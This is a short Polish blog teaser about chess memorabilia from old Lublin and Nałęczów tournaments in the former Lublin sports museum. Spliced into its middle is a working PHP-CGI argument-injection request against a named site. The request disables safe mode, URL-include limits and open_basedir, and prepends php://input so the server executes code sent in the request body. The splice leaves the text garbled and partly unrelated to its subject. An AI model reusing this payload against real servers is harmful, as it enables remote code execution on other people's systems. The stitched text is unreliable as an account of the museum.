Zbiory dawnego Muzeum Sportu – szachy

http://stuarturbandesign.com/cgi-bin/php4?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n W zbiorach dawnego Muzeum Kultury Fizycznej i Sportu w Lublinie (Odział Muzeum Okręgowego) znajduje się kilka pamiątek po turniejach szachowych odbywających się niegdyś w Lublinie i Nałęczowie. Czytaj więcej „Zbiory dawnego Muzeum Sportu – szachy”